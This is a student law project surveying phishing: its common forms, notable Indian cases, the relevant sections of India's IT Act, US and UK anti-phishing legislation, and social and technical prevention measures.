Prevention And Regulation of Phishing in

Cyber World: National & International

Framework.

Project submitted to

Mr.

(Faculty: Cyber Law)

Spandan Pujari

Section : B

Roll No.144

Semester VII

HIDAYATULLAH NATIONAL LAW UNIVERSITY RAIPUR,

CHHATTISGARH

TABLE OF CONTENTS

ACKNOWLEDGMENT......................................................

.............................................. 3

RESEARCH

METHODOLOGY……………………………….......................................

4

OBJECTIVE………………………………………………………………………………...4

INTRODUCTION........................................................

........................................................ 5

REASONS FOR GROWTH…………………………………………………………………7

PHISHING TECHNIQUES…………………………………………………………………8

PHISHING ATTACKS IN INDIA………………………………………………............... 10

REGULATION UNDER INDIAN & INTERNATIONAL LAWS……….……………...12

PREVENTION OF PHISHING ……………….…………………………………………..15

CONCLUSION……………………………………………………………………………..17

BIBLIOGRAPHY………………………………............................................

.................. ..18

ACKNOWLEDGMENTS

I would like to express my heartfelt gratitude to my teacher, Mr.

for his unstinted support. I would like to thank the faculty for

giving me the chance for researching on such an intriguing and

progressive issue as this.

Thank you, jurists and masters of law for the expression of your

ideas, thoughts and immense amount of knowledge in the form of

the various books, articles and opinions. Without all of this, it

would have been a Herculean task for me to complete this project.

My gratitude also goes out to the staff and administration of

HNLU for the infrastructure in the form of our library and IT Lab

that was a source of great help for the completion of this

project.

Spandan Pujari

Semester VII

RESEARCH METHODOLOGY

The research methodology used in the project is doctrinal in

nature the references used are in the form of secondary source.

Secondary and Electronic resources have been largely used to

gather information and data about the topic. Books and other

reference as guided by Faculty of Cyber Law have been primarily

helpful in giving this project a firm structure. Websites,

dictionaries and articles have also been referred. Footnotes have

been provided wherever needed, either to acknowledge the source

or to point to a particular provision of law. Uniform citation

has been followed.

OBJECTIVES

• To understand the concept of Phishing.

• Reason for growth of Phishing.

• To get thorough classification of Phishing.

• To know the dangers of Phishing.

• To comprehend the legislation and regulation for Phishing

• To advise against Phishing and security measures.

INTRODUCTION

The first documented use of the word "phishing" took place in1996. Most people believe it originated as an alternativespelling of "fishing," as in "to fish for information".

Phishing is the attempt to acquire sensitive information such as

usernames, passwords, and credit card details (and sometimes,

indirectly, money) by masquerading as a trustworthy entity in an

electronic communication.1 Communications purporting to be from

popular social web sites, auction sites, banks, online payment

processors or IT administrators are commonly used to lure

unsuspecting public. Phishing emails may contain links to

websites that are infected with malware.2 Phishing is typically

carried out by email spoofing3 or instant messaging,4 and it

often directs users to enter details at a fake website whose look

and feel are almost identical to the legitimate one. Phishing is

an example of social engineering techniques used to deceive

1 Van der Merwe, A J, Loock, M, Dabrowski, M. (2005), Characteristics and Responsibilities involved in a Phishing Attack, Winter International Symposium on Information and Communication Technologies, Cape Town, January 2005.2 Safe Browsing (Google Online Security Blog)"3 Landing another blow against email phishing (Google Online Security Blog)4 Tan, Koontorm Center. "Phishing and Spamming via IM (SPIM)"

users,and exploits the poor usability of current web security

technologies. Attempts to deal with the growing number of

reported phishing incidents include legislation, user training,

public awareness, and technical security measures. Many websites

have now created secondary tools for applications, like maps for

games, but they should be clearly marked as to who wrote them,

and you should not use the same passwords anywhere on the

internet.

Phishing is a continual threat that keeps growing to this day.

The risk grows even larger in social media such as Facebook,

Twitter, Myspace etc. Hackers commonly use these sites to attack

persons using these media sites in their workplace, homes, or

public in order to take personal and security information that

can affect the user and the company (if in a workplace

environment). Phishing is used to portray trust in the user since

you can usually not tell that the site or program being visited/

used is not real, and when this occurs is when the hacker has the

chance to access the personal information such as passwords,

usernames, security codes, and credit card numbers among other

things.

A phishing technique was described in detail in a paper and

presentation delivered to the International HP Users Group,

Interex. 5The first recorded mention of the term "phishing" is

5 Felix, Jerry and Hauck, Chris (September 1987). "System Security: A Hacker's Perspective". 1987 Interex Proceedings

found in the hacking tool AOHell (according to its creator),

which included a function for stealing the passwords or financial

details of America Online users.6[10] Phishing is hosting by the

top ten countries and they are US, UK, Germany, Brazil, Canada,

France, Russia, Poland, The Netherlands and Japan. According to

Ghosh, there were "445,004 attacks in 2012 as compared to 258,461

in 2011 and 187,203 in 2010” which depicts that phishing has been

threatening the individuals.

A recent and popular case of phishing is the suspected Chinese

phishing campaign targeting Gmail accounts of highly ranked

officials of the United States and South Korean’s Government,

military, and Chinese political activists.The Chinese government

continues to deny accusations of taking part in cyber-attacks

from within its borders, but evidence has been revealed that

China’s own People’s Liberation Army has assisted in the coding

of cyber-attack software.

6 Langberg, Mike (September 8, 1995). "AOL Acts to Thwart Hackers". San Jose Mercury News

REASONS FOR GROWTH

There are three major factors behind the recent spurt in phishing

attacks worldwide particularly in India:

1. Unawareness among public: Worldwide, particularly in India,

there has been lack of awareness regarding the phishing

attacks among the common masses. The users are unaware that

their personal information is actively being targeted by

criminals and they do not take proper precautions when they

conduct online activities.

2. Unawareness of policy – The fraudsters often count on

victim’s unawareness of Bank/financial institution policies

and procedures for contacting customers, particularly for

issues relating to account maintenance and fraud

investigation. Customers unaware of the policies of an

online transaction are likely to be more susceptible to the

social-engineering aspect of a phishing scam, regardless of

technical sophistication.

3. Technical sophistication – Fraudsters are now using advanced

technology that has been successfully used for activities

such as spam, distributed denial of service (DDoS),and

electronic surveillance. Even as customers are becoming

aware of phishing, criminals are developing techniques to

counter this awareness. These techniques include URL

obfuscation to make phishing emails and web sites appear

more legitimate, and exploitation of vulnerabilities in web

browsers that allow the download and execution of malicious

code from a hostile web site

PHISHING TECHNIQUES

Phishing

Phishing is a way of attempting to acquire information such as

usernames, passwords, and credit card details by masquerading as

a trustworthy entity in an electronic communication.

Spear phishing

Phishing attempts directed at specific individuals or companies

have been termed spearphishing.7Attackers may gather personal

information about their target to increase their probability of

success. This technique is, by far, the most successful on the

internet today, accounting for 91% of attacks8

Clone phishing

A type of phishing attack whereby a legitimate, and previously

delivered, email containing an attachment or link has had its

content and recipient address(es) taken and used to create an

almost identical or cloned email. The attachment or Link within

the email is replaced with a malicious version and then sent from

an email address spoofed to appear to come from the original

sender. It may claim to be a resend of the original or an updated

version to the original. This technique could be used to pivot

(indirectly) from a previously infected machine and gain a

foothold on another machine, by exploiting the social trust

associated with the inferred connection due to both parties

receiving the original email.

Whaling

Several recent phishing attacks have been directed specifically

at senior executives and other high profile targets within

businesses, and the term whaling has been coined for these kinds

of attacks.

7  "What is spear phishing?". Microsoft Security At Home.8 Stephenson, Debbie. "Spear Phishing: Who’s Getting Caught?". Firmex.

Rogue WiFi (MitM)

Attackers set up or compromise free Wifi access-points, and

configure them to run man-in-the-middle (MitM) attacks, often

with tools like sslstrip, to compromise all access point users.

Man-in-the-middle attacks

In this class of attack, the attacker sits between the customer

and the real web-based application, and proxies all

communications between the systems. This form of attack is

successful for both HTTP and HTTPS communications. The customer

connects to the attackers server as if it was the real site,

while the attackers server makes a simultaneous connection to the

real site. The attackers server then proxies all communications

between the customer and the real web-based application server –

typically in real-time.

URL Obfuscation Attacks

Using a URL obfuscation technique which involves minor changes

to the URL, the fraudster tricks the user to follow a hyperlink

(URL) to the attackers’ server, without the users realizing that

he has been duped. URL Obfuscation uses the unspoken, unwritten

secrets of the TCP/IP protocol to trick users into viewing a

website that they did not intend to visit.

XSS (Cross-site Scripting)

Cross-site scripting attacks (XSS) make use of custom URL or code

injection into a valid web-based application URL or imbedded data

field. In general, these XSS techniques are the result of failure

of a site to validate user input before returning it to the

client’s web-browser. Phishing scenario in XSS: • Victim logs

into a web site • Attacker has spread “mines” using an XSS

vulnerability • Victim fall upon an XSS mine • Victim gets a

message saying that their session has terminated, and they have

to authenticate again • Victim’s username and password are send

to attacker

PHISHING IN INDIA

Phishing is a relatively new concept in India, unheard of couple

of years back but recently there has been rise in the number of

phishing cases in India where the innocent public fall prey to

the sinister design of fraudster. In India, the most common form

of phishing is by email pretending to be from a bank, where the

sinister asks to confirm your personal information/login detail

for some made up reason like bank is going to upgrade its server.

Needless to say, the email contains a link to fake website that

looks exactly like the genuine site. The gullible customers

thinking that it is from the bank, enter the information asked

for and send it into the hands of identity thieves. There were

phishing attempts over ICICI Bank, UTI Bank, HDFC Bank, SBI etc.

in which the Modus operandi was similar. It was reported that a

large number of customers of these banks had received emails,

which have falsely been misrepresented to have been originated

from their bank. The recipients of the mails were told to update

their bank account information on some pretext. These emails

included a hyperlink with-in the email itself and a click to that

link took recipients to a web page, which was identical to their

bank’s web page. Some of the unsuspecting recipients responded to

these mails and gave their login information and passwords. Later

on, through internet banking and by using the information so

collected a large number of illegal/fraudulent transactions took

place. Apart from the general banking phishing scams, some of the

recent phishing attacks that took place in India are as follows:

RBI Phishing Scam: In a daring phishing attack of its kind,

the fraudsters even have not spared the Reserve Bank of

India. The phishing email disguised as originating from the

RBI, promised its recipient prize money of Rs.10 Lakhs

within 48 hours, by giving a link which leads the user to a

website that resembles the official website of RBI with the

similar logo and web address. The user is then asked to

reveal his personal information like password, I-pin number

and savings account number. However, the RBI posted a

warning regarding the fraudulent phishing e-mail on the

banks official website.

IT Department Phishing Scam: The email purporting to be

coming from the Income Tax Department lures the user that he

is eligible for the income tax refund based on his last

annual calculation, and seeks PAN CARD Number or Credit Card

details.

ICC World Cup 2011: One of the biggest sporting events is

also under phishing attack. The fraudsters have specifically

targeted the internet users of the host countries i.e.

India, Bangladesh and Sri Lanka where the matches of the

world cup are going on. India, which has been allotted 29

matches of the world cup, is obviously the prime targets of

the phishing attacks.

.

REGULATIONS UNDER INDIAN AND INTERNATIONAL LAWS

The phishing fraud is an online fraud in which the fraudster

disguise themselves and use false and fraudulent websites of bank

and other financial institutions, URL Links to deceive people

into disclosing valuable personal data, later on which is used to

swindle emoney from victim account. Thus, essentially it is a

cyber crime and it attracts many penal provisions of the

Information Technology Act, 2000 as amended in 2008 adding some

new provisions to deal with the phishing activity. The following

Sections of the Information Technology Act, 2000 are applicable

to the Phishing Activity:

Section 66: The account of the victim is compromised by the

phisher which is not possible unless & until the fraudster

fraudulently effects some changes by way of deletion or

alteration of information/data electronically in the account

of the victim residing in the bank server. Thus, this act is

squarely covered and punishable u/s 66 IT Act.

Section 66A: The disguised email containing the fake link of

the bank or organization is used to deceive or to mislead

the recipient about the origin of such email and thus, it

clearly attracts the provisions of Section 66A IT Act, 2000

Section 66C: In the phishing email, the fraudster disguises

himself as the real banker and uses the unique identifying

feature of the bank or organization say Logo, trademark etc.

and thus, clearly attracts the provision of Section 66C IT

Act, 2000.

Section 66D: The fraudsters through the use of the phishing

email containing the link to the fake website of the bank or

organizations personates the Bank or financial institutions

to cheat upon the innocent persons, thus the offence under

Section 66D too is attracted.

The Information Technology Act, 2000 makes penal provisions under

the Chapter XI of the Act and further, Section 81 of the IT Act,

2000 contains a non obstante clause, i.e. “the provisions of this

Act shall have effect notwithstanding anything inconsistent

therewith contained in any other law for the time being in

force”. The said non obstante clause gives an overriding effect

to the provisions of the IT Act over the other Acts including the

Indian Penal Code. The aforesaid penal provisions of the IT Act,

2000which is attracted to the phishing scam are however been made

bailable by virtue of Section 77B IT Act intentionally in view of

the fact that there is always an identity conflict as to the

correct or accurate identity of the person behind the alleged

phishing scam and there is always a smokescreen behind the

alleged crime as to the identity of the person who has actually

via these online computer resources have or have not committed

the offence and in view of the possible misuse of the penal

provision for cyber offences as contained in the IT Act, the

offence is made bailable.

US Legislation on Phishing

The Congress of the USA have enacted a statute regarding Phishing

attacks named THE ANTI-PHISHING ACT OF 2005

The Act added two crimes to the current federal law:

1. It criminalized the act of sending a phishing email regardless

of whether any recipients of the email suffered any actual

damages.

2. It criminalized the act of creating a phishing website

regardless of whether any visitors to the website suffered any

actual damages.

Senator Leahy described the effects of the Act in this way:

The [Act] protects the integrity of the Internet in two ways.

First, it criminalizes the bait. It makes it illegal to

knowingly send out spoofed email that links to sham websites,

with the intention of committing a crime. Second, it

criminalizes the sham websites that are the true scene of the

crime.

If someone is convicted under the law passed by congress for

phishing they could risk spending up to five years in prison. The

people convicted of phishing may also have to pay a $250,000

fine.

Congress and Phishing has resulted in steps to see that people

can be charged with phishing just for attempting the scam. It

doesn’t matter if the phishers were successful or made anything

off their criminal venture.

Unfortunately it can be very hard to catch people like this for a

number of reasons. First of all there are hundreds of people out

there that are phishers. Second they often try to keep a low

profile for their website to ensure they are not easily found.

This means it can take time to find and capture the criminal.

Meanwhile, the people phishing are continuing to defraud

companies all over the internet by stealing people’s information

and using it for themselves.

UK Law on Phishing

The UK government is reforming fraud laws to create an offence

covering the perpetrators of phishing attacks. The provision is

among a raft of measures designed to clarify existing laws within

the new Fraud Bill, which was introduced in the House of Lords on

Wednesday.

A new offence of fraud, designed to strengthen the existing law

and ease the prosecution process, is the main feature of the

bill. The offence can be committed in one of three ways: false

representation (as seen in phishing attacks); abuse of position

(e.g. a person lifting money from the account of an elderly

person under their care) and failing to disclose information

(e.g. a lawyer who schemes to keep information from his client so

he can make money on the side).

Judges will be able to impose sentences of up to 10 years for any

of these three offences. This means fraudsters who pose as

financial institutions in the commission of phishing attacks, a

form of false representation, could become the subject of

extradition proceedings.

PREVENTION OF PHISHING

Phishing is a dangerous activity and have caused incredible

damage. The damage caused by phishing ranges from denial of

access to email to substantial financial loss. It is estimated

that between May 2004 and May 2005, approximately 1.2 million

computer users in the United States suffered losses caused by

phishing, totaling approximately US$929 million. United States

businesses lose an estimated US$2 billion per year as their

clients become victims. In 2007, phishing attacks escalated. 3.6

million adults lost US$3.2 billion in the 12 months ending in

August 2007.Microsoft claims these estimates are grossly

exaggerated and puts the annual phishing loss in the US at US$60

million. In the United Kingdom losses from web banking fraud—

mostly from phishing—almost doubled to GB£23.2m in 2005, from

GB£12.2m in 2004,while 1 in 20 computer users claimed to have

lost out to phishing in 2005.

According to 3rd Microsoft Computing Safer Index Report released

in February 2014, the annual worldwide impact of phishing could

be as high as $5 billion.

The stance adopted by the UK banking body APACS is that

"customers must also take sensible precautions ... so that they

are not vulnerable to the criminal."Similarly, when the first

spate of phishing attacks hit the Irish Republic's banking sector

in September 2006, the Bank of Ireland initially refused to cover

losses suffered by its customers (and it still insists that its

policy is not to do so), although losses to the tune of €113,000

were made good.

Social responses

One strategy for combating phishing is to train people to

recognize phishing attempts, and to deal with them. Education can

be effective, especially where training provides direct feedback

People can take steps to avoid phishing attempts by slightly

modifying their browsing habits. When contacted about an account

needing to be "verified" (or any other topic used by phishers),

it is a sensible precaution to contact the company from which the

email apparently originates to check that the email is

legitimate. Alternatively, the address that the individual knows

is the company's genuine website can be typed into the address

bar of the browser, rather than trusting any hyperlinks in the

suspected phishing message.

Technical responses

Helping to identify legitimate websites

Secure connection

Overcoming fundamental flaws in the security model of securebrowsing

Browsers alerting users to fraudulent websites

Augmenting password logins

Eliminating phishing mail

Monitoring and takedown

Transaction verification and signing

CONCLUSION

Phishing is a major concern in the contemporary e-commerce

environment in India and will continue to be so because of the

lack of awareness among the Internet users who are new to the

cyber-space. There is no silver bullet to thwart the phishing

attack. However, it has been noticed in the most of the phishing

scams worldwide particularly in India that the hacker succeeds in

phishing attempt due to the uninformed, gullible customers who

without knowing that they are being trapped unwittingly pass on

the information asked for by the fraudster. Therefore, the

awareness and customer education is the key here to fight the

menace of the “Phishing” apart from mitigating or preventative

measures. The law enforcement agencies, the legislature, the

industry should come together and coordinate in their fight

against the menace of the Phishing.

BIBLIOGRAPHY

Information Technology Act, 2000

Websites Referred

http://www.theregister.co.uk/2005/05/27/fraud_law_reform/

law.duke.edu/journals/dltr/articles/2005dltr0006.html